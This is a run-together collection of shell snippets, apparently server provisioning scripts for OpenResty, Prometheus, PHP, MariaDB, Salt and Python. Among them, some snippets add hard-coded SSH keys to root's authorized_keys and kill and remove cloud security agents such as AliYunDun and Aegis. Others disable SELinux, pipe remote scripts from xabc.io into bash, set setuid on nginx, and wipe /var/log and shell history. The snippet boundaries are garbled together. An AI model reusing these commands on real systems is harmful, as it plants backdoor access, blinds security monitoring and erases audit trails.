wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/nginx.conf -O /opt/openresty/nginx/conf/nginx.conf
mkdir -p /opt/openresty/nginx/conf/ssl
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
chown root.nobody /opt/openresty/nginx/sbin/nginx
if [ "$OS" = "RedHat" ]
then
grep -q nginx /etc/rc.d/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.d/rc.local;chmod 755 /etc/rc.d/rc.local
fi
if [ "$OS" = "Debian" ]
then
grep -q nginx /etc/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.local;chmod 755 /etc/rc.local
fi
chmod +xs /opt/openresty/nginx/sbin/nginx
echo "/opt/openresty"prb pgrep prometheus|xargs kill -9
pgrep blackbox|xargs kill -9
pgrep alertmanager|xargs kill -9
sleep 2
pgrep alertmanager||(/srv/zero/1/prometheus/alertmanager/alertmanager --config.file=/srv/zero/1/prometheus/alertmanager/alertmanager.yml --cluster.listen-address='' --storage.path=/srv/zero/1/prometheus/alertmanager/data &>/srv/zero/1/prometheus/logs/alertmanager.log &)
pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)
pgrep prometheus||(/srv/zero/1/prometheus/prometheus --config.file=/srv/zero/1/prometheus/prometheus.yml --storage.tsdb.path=/srv/zero/1/prometheus/data --web.enable-lifecycle &>/srv/zero/1/prometheus/logs/prometheus.log &)wp yum -y remove webtatic-release-7-3.noarch
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum -y remove php72w-mysql
yum -y install php72w-mysqlnd
chmod 777 /var/lib/php/session/
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/phpmyadmin.tgz -O -|tar xzf - -C /opt/wordpress
chown nobody.nobody -R /opt/wordpress/phpmyadmin
echo "user:root password:io"php cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum -y install php72w
yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm
yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo
fi
if [ "$OS" = "Debian" ];then
apt-get -y install php7.[0-9]
apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm
apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc
fie wget -q https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/ywgx.sh -O /etc/profile.d/ywgx.sh;chmod 644 /etc/profile.d/ywgx.shuuid cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install libuuid-devel
fi
if [ "$OS" = "Debian" ];then
apt-get -y install uuid-dev
fix cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
rm -f /var/lib/rpm/__db*
rpm --rebuilddb
yum install -y yum-utils
yum clean all
yum-complete-transaction --cleanup-only
yum history redo last
package-cleanup --dupes;package-cleanup --problems
yum clean metadata
yum makecache
yum clean expire-cache
fi
if [ "$OS" = "Debian" ];then
dpkg --configure -a
apt-get --fix-broken install
apt-key update
apt-get -f -y install --allow-unauthenticated --force-yes
apt-get clean
cd /var/lib/apt&&rm -rf lists;mkdir -p /var/lib/apt/lists/partial
apt-get clean
apt-get update
fiminion_clean systemctl stop salt-minion
pkill salt-minion &>/dev/null
killall salt-minion &>/dev/null
pkill salt-minion &>/dev/null
rm -fr /etc/salt/pki/minion /var/log/salt/minion*
service salt-minion restartdc curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m) -o /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
a if ! grep -q "ge4MSI5hlWSw" /root/.ssh/authorized_keys &>/dev/null;then
[ -d /root/.ssh ]||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDHZyWeFOHuHtLgsGLNx4sCYVXv/FfFi3ZcTSOSyX2oRgRm4xflPDgJHGSlCjtP2IluM6gG+o9+fS0WpcQkiaabe4wJVf5/hdFvJY7BgG4SslmdYGGtXKqFKXLq0pkuQQTnitBYQvAwEjBuHYB0KuuJG1XSss3ubzTZzoveeIVOJgamoGgm42D2G0ZOAH7ovRj3eFvjJImepaSJEDUe1SbNHoptSQvLMV+y5LDNb7xxRUk4hH09o/f2O9jxPbxL8f9nP94ZoT2XjVhvKRKVz51AHs9pNTry7ge4MSI5hlWSwjiFO+jJLuIiGdRGVxEzToMOkPBaH3HXs1pJHu+/9fqCwvgW4+Wp7FTBhPmX/9VSjGpO+uwlj3zRZHyDxs3Enup+Bok/WH9e5GLQj/KzWQD6s/6s0/9UC9YfZRU7E+uRvXf21zpAkmaGGQsOv5FV7ZqciYRn66dq65ahx2xmi4hkBoTrdP595lRPuQEOW1ziTI08pxU9eZA/f/s4AsQL/IHU9LkiA8gqGXlembuBxL20OietQTLn5AYev6rmU0m4IZ1yKu2AzT5gaG//8XuSGzT0o8ppvSgIalDBnS+W/2xQCc0xGY7yX51MIdc+E7edWw14VqL0ESXIHZfB7uOGOAMjfMP3GIoHOIatI+rsd8D30sKEEBXDYAgwu2yZgskGmw== local" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
fi
if ! grep -q "D70SYXrt" /root/.ssh/authorized_keys &>/dev/null;then
[ -d /root/.ssh ]||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCsqDg6fh5HpDUE5BC1orEy4miYe//+Y6JE9o4YLUQZSmMZmLxsr/+HznjHnNBxVHNrlrOR9Y9/+5sdrLRF+mNe4bGpiDzWZHGq9YqyBDLnJG1D0SYd6SFXtel1542LRW2CwUUGWq/O9uF91Kbqgcrc54Dh/2xVQLoN8tSn9D70SYXrtWLEeZWM/0fPJpO5wma+T7WgF9/2n3GVKEnX4xR79Y95OcEV0eFd0jsuJWraudrc7VIXkhEGxD0b3y4KZRZNPJqQnH1gRfrAtk5+vmLDL/fJZw6YWOB44R4oKG/3Vj1I8gsXVXGQwefVft2B/6JAY8m+aiHSp0zAullgmFn ops" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
fi
which setenforce &>/dev/null&&setenforce -1 &>/dev/null
[ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/configos cat /etc/issue* /etc/*releasefile curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/filelist.sh -o /etc/profile.d/filelist.sh
yum install axel wget
pip3 install rsa
pip3 install Crypto
pip3 install pycryptos if ! grep -q "QmNkqIhy" /root/.ssh/authorized_keys &>/dev/null;then
[ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCciOA6PlTAAzYjSoavHXB+xyBG6PmhFumTPI7xrwsZfU/QjDxr3f/Q9x4RaqrQ+5i/wqxX00/ztR37WLza/6zn7gm06XqMMyZ4pdthxoJNS5eOKAXst8z1vTZsEIPY3ZzlQmNkqIhyUwcsc+4elHXdNB3DPxuxNYY8N7oHgZ7NYydZGHmPugpIjnAcDDh2llJ+RlO/oHnrU84gGAPtmf0me45TgFqDQj1sFzdAWB5iaChEq+/9t4B1vK78yM7zt3jDZfXoqdV/bB4DWaUB8X9WsgwTyrJflzzpsJSI1EhUgVAP6X0h13hR3tiyE3Xjksnc6Qbqu+JFm6e+opHf4+bn ywgx@E" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
fipython3 yum install -y python3-devel libcurl-develk rm -rf /etc/motd &>/dev/null
rm -fr /usr/local/{aegis,qcloud,cloudmonitor} &>/dev/null
rm -rf /lib/systemd/system/aliyun.service &>/dev/null
mkdir /usr/local/{aegis,cloudmonitor,qcloud}
killall -9 sgagent &>/dev/null
killall -9 barad_agent &>/dev/null
killall -9 aliyun_assist_update &>/dev/null
killall -9 aliyun_assist_update &>/dev/null
killall -9 AliSecureCheckAdvanced &>/dev/null
killall -9 CmsGoAgent.linux-amd64 &>/dev/null
kill -9 `pidof YDLive` &>/dev/null
kill -9 `pidof YDService` &>/dev/null
kill -9 `pidof wrapper` &>/dev/null
kill -9 `pidof AliYunDun` &>/dev/null
kill -9 `pidof AliYunDunUpdate` &>/dev/nullmysql cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo
yum -y install mariadb mariadb-server
systemctl start mariadb
systemctl enable mariadb
mysql_secure_installation
fi
if [ "$OS" = "Debian" ];then
apt-get -y install mysql-server
fimaster curl -s xabc.io/b|bash
curl -s xabc.io/v|bash
yum -y install epel-release
yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync
[ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local
timedatectl set-timezone Asia/Shanghai
hostnamectl --static set-hostname master-44.192.95.161;
systemctl disable firewalld
curl -s xabc.io/py3b|bash
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum clean expire-cache
yum -y install salt-master
yum -y install salt-ssh
yum -y install ansible
/usr/bin/pip3 install redis==3.5.3 flask cryptography==3.1 pyinotify
systemctl enable iptables.service
systemctl enable salt-master.service
[ -d /opt/sys ]||mkdir -p /opt/sys
[ -d /opt/master ]||mkdir -p /opt/master
[ -d /srv/salt ]||mkdir -p /srv/salt
[ -d /srv/reactor ]||mkdir -p /srv/reactor
[ -d /etc/sysconfig ]||mkdir -p /etc/sysconfig
[ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin
[ -d /root/.pip ]||mkdir -p /root/.pip
[ -d /srv/pillar ]||mkdir -p /srv/pillar
[ -d /root/.xabc ]||mkdir -p /root/.xabc
[ -d /etc/ansible ]||mkdir -p /etc/ansible
[ -d /srv/salt/src ]||mkdir -p /srv/salt/src
[ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d
[ -d /srv/salt/files ]||mkdir -p /srv/salt/files
[ -d /srv/salt/group ]||mkdir -p /srv/salt/group
[ -d /etc/salt/master.d ]||mkdir -p /etc/salt/master.d
[ -d /srv/salt/base/files ]||mkdir -p /srv/salt/base/files
[ -d /srv/salt/open/files ]||mkdir -p /srv/salt/open/files
[ -d /srv/zero/1/webhook ]||mkdir -p /srv/zero/1/webhook
[ -d /srv/zero/1/prometheus/rules ]||mkdir -p /srv/zero/1/prometheus/rules
[ -d /srv/zero/1/prometheus/conf/node ]||mkdir -p /srv/zero/1/prometheus/conf/node
[ -d /srv/zero/1/prometheus/conf/http ]||mkdir -p /srv/zero/1/prometheus/conf/http
[ -d /srv/zero/1/prometheus/conf/ping ]||mkdir -p /srv/zero/1/prometheus/conf/ping
[ -d /srv/zero/1/prometheus/conf/tcp ]||mkdir -p /srv/zero/1/prometheus/conf/tcp
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/xabc.sh -O /etc/profile.d/xabc.sh
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/pip.conf -O /root/.pip/pip.conf
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/.bashrc -O /root/.bashrc
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/telnet.py -O /usr/local/bin/telnet.py
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/xabcdl -O /usr/local/bin/xabcdl
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/redis/redis-cli -O /usr/local/bin/redis-cli
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/redisdl -O /usr/local/bin/redisdl
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/iptables -O /etc/sysconfig/iptables
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/master -O /etc/salt/master
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/Saltfile -O /etc/salt/Saltfile
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/reactor.conf -O /etc/salt/master.d/reactor.conf
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/redis.conf -O /srv/zero/2/redis/conf/redis.conf
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/nginx.conf -O /srv/zero/0/openresty/nginx/conf/nginx.conf
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/rc.local -O /etc/rc.d/rc.local
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/xabc-sysctl.conf -O /etc/sysctl.d/xabc.conf
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/genkey.py -O /opt/sys/genkey.py
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/kk.py -O /srv/zero/bin/kk.py
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/air.py -O /srv/zero/bin/air.py
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/sentinel.py -O /srv/zero/bin/sentinel.py
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/webhook.py -O /srv/zero/1/webhook/webhook.py
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/.prometheus.yml -O /srv/salt/files/.prometheus.yml
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/.alertmanager.yml -O /srv/salt/files/.alertmanager.yml
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/top.sls -O /srv/salt/top.sls
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/pillar_top.sls -O /srv/pillar/top.sls
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/custom.sls -O /srv/salt/base/custom.sls
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/conf.py -O /srv/zero/1/webhook/conf.py
for i in blackbox_exporter.tgz node_exporter.tgz gpu_exporter.tgz;do wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/$i -O -|tar xzf - -C /srv/salt/src;done
ln -s /srv/salt/files/.prometheus.yml /srv/zero/1/prometheus/prometheus.yml
ln -s /srv/salt/files/.alertmanager.yml /srv/zero/1/prometheus/alertmanager/alertmanager.yml
ln -s /srv/salt/files/.node_exporter_rules.yml /srv/zero/1/prometheus/rules/node_exporter_rules.yml
ln -s /srv/salt/files/.blackbox_exporter_rules.yml /srv/zero/1/prometheus/rules/blackbox_exporter_rules.yml
ln -s /srv/salt/files/node_exporter_targets.yml /srv/zero/1/prometheus/conf/node/node_exporter_targets.yml
chmod +x /opt/sys/genkey.py /srv/zero/1/webhook/webhook.py /srv/zero/bin/kk.py /srv/zero/bin/sentinel.py /srv/zero/bin/air.py /etc/rc.local /etc/rc.d/rc.local
[ -e /srv/salt/base/files/cluster_id_rsa ]||/opt/sys/genkey.py
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx
chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx
chmod +x /usr/local/bin/redis-cli /usr/local/bin/redisdl /usr/local/bin/xabcdl /usr/local/bin/telnet.py
[ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key
rm -rf /var/log /var/cache/salt/minion /root/.bash_history;mkdir -p /var/log
echo -e "31 05 * * 1 find /root/.ssh/ /home/*/.ssh/ -name known_hosts -delete\n*/5 * * * * pgrep redis-server||(/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf)\n*/5 * * * * pgrep sentinel.py||(/srv/zero/bin/sentinel.py &>>/var/log/xabc.log &)\n*/5 * * * * pgrep webhook.py||(/srv/zero/1/webhook/webhook.py &>>/var/log/webhook.log &)\n*/5 * * * * pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)\n17 03 * * * /srv/zero/bin/air.py" > /var/spool/cron/root
pgrep redis-server||/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf
/srv/zero/bin/air.pypy3b if ! type python3 &>/dev/null;then
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
if [ ! -d "/usr/local/lib/python3.8" ];then
echo doing...
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/lib-python3.8.tgz -O -|tar xzf - -C /usr/local/lib
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/include-python3.8.tgz -O -|tar xzf - -C /usr/local/include
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/pip3.8 -O /usr/local/bin/pip3.8
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/python3.8 -O /usr/local/bin/python3.8
chmod +x /usr/local/bin/pip3.8 /usr/local/bin/python3.8
ln -s /usr/local/bin/python3.8 /usr/local/bin/python3
source /etc/profile
echo "done"
fi
fi
firunner yum install git -y
#curl -L --output /usr/local/bin/gitlab-runner https://gitlab-runner-downloads.s3.amazonaws.com/latest/binaries/gitlab-runner-linux-amd64
#chmod +x /usr/local/bin/gitlab-runner
#gitlab-runner install --user=root --working-directory=/root
#gitlab-runner start
#gitlab-runner registerpy3 cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl
yum -y install zlib-devel libffi-devel openssl-devel
fi
if [ "$OS" = "Debian" ];then
apt -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential
apt -y install zlib1g-dev libffi-devel libssl-dev
fi
#PYTHON_VER=3.8.3
PYTHON_VER=3.9.2
mkdir -p /tmp/build&&cd /tmp/build
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/python/Python-$PYTHON_VER.tgz -O -|tar xzf -
cd Python-$PYTHON_VER
#./configure --enable-optimizations
./configure
make && make install
pip3 install bson markdown pyaml pyyaml numpy pymongo redis uvloop
pip3 install aiosmtplib
pip3 install tornado
rm -fr /tmp/buildf salt \* saltutil.refresh_pillarawscli #yum install -y unzip
#https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip
rm -rf /tmp/aws
curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/aws/awscli-exe-linux-x86_64.zip -o /tmp/awscli-exe-linux-x86_64.zip
unzip -q /tmp/awscli-exe-linux-x86_64.zip -d /tmp/
/tmp/aws/install -i ~/.local/aws-cli -b ~/.local/binrestful 看URL就知道要什么
看http method就知道干什么
看http status code就知道结果如何
debug salt-minion -l debug